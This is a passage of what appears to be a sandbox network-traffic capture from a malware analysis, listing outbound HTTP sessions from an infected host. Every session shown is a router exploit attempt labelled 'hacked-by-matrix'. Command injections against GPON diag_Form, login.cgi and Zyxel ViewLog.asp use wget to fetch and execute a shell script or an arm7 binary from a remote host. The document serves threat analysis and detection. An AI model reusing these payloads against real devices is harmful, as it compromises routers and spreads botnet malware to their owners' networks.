                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE></HEAD><BODY><H1>400 ERROR</H1><H2>The request could not be satisfied.</H2><HR noshade size="1px">Bad request.We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.<BR clear="all">If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.<BR clear="all"><HR noshade size="1px"><PRE>Generated by cloudfront (CloudFront)Request ID: voZiyThbkxT-yZpk1oNr4OktDsaXPa7DGbtKVtGYoO_nsiRHHPi_vQ==</PRE><ADDRESS></ADDRESS></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.1334800118.48.34.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616646051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.13572485.71.9.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616669893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.1337888109.25.122.181443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616674900 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.1353576118.149.213.192443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616684914 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.13604145.168.206.223443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616722107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.1350038109.40.235.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616727114 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.1335966118.110.48.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616745949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        659192.168.2.1334654118.129.234.15180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.616772890 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:48.004280090 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:48.943315029 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:50.796319008 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:54.641760111 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:02.060247898 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:16.912262917 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:47.116209984 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        660192.168.2.1335334212.21.136.6580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.705372095 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:47.908256054 CET88INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Mar 21, 2024 05:22:47.908272028 CET260INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65
                                                        Data Ascii: Keep-Alive: timeout=20Content-Type: text/html12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        661192.168.2.1335302212.21.136.6580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:47.894771099 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:48.975308895 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:49.178000927 CET88INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Mar 21, 2024 05:22:49.178071976 CET260INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65
                                                        Data Ascii: Keep-Alive: timeout=20Content-Type: text/html12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.
                                                        Mar 21, 2024 05:22:50.521708965 CET260INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65
                                                        Data Ascii: Keep-Alive: timeout=20Content-Type: text/html12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.
                                                        Mar 21, 2024 05:22:52.522128105 CET336INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Keep-Alive: timeout=20
                                                        Content-Type: text/html
                                                        Data Raw: 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 6f 67 69 6e 2e 63 67 69 3f 63 6c 69 3d 61 61 25 32 30 61 61 25 32 37 3b 77 67 65 74 25 32 30 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 25 32 30 2d 4f 25 32 30 2d 25 33 45 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 25 32 37 24 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.0
                                                        Mar 21, 2024 05:22:56.441309929 CET336INHTTP/1.1 404 Not Found
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Keep-Alive: timeout=20
                                                        Content-Type: text/html
                                                        Data Raw: 31 32 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 41 32 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6c 6f 67 69 6e 2e 63 67 69 3f 63 6c 69 3d 61 61 25 32 30 61 61 25 32 37 3b 77 67 65 74 25 32 30 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 25 32 30 2d 4f 25 32 30 2d 25 33 45 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 25 32 30 2f 74 6d 70 2f 6d 61 74 72 69 78 25 32 37 24 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 12<h1>Not Found</h1>A2The requested URL /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ was not found on this server.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        662192.168.2.1337906212.76.103.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.051440954 CET228OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        663192.168.2.134816486.104.253.14280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.176002979 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:49.040637970 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.028306007 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:50.190402985 CET410INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=10
                                                        Location: https://www.nigorine.com/cgi-bin/ViewLog.asp
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:50.190442085 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:22:50.538328886 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        664192.168.2.134806082.198.214.9880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:48.186037064 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
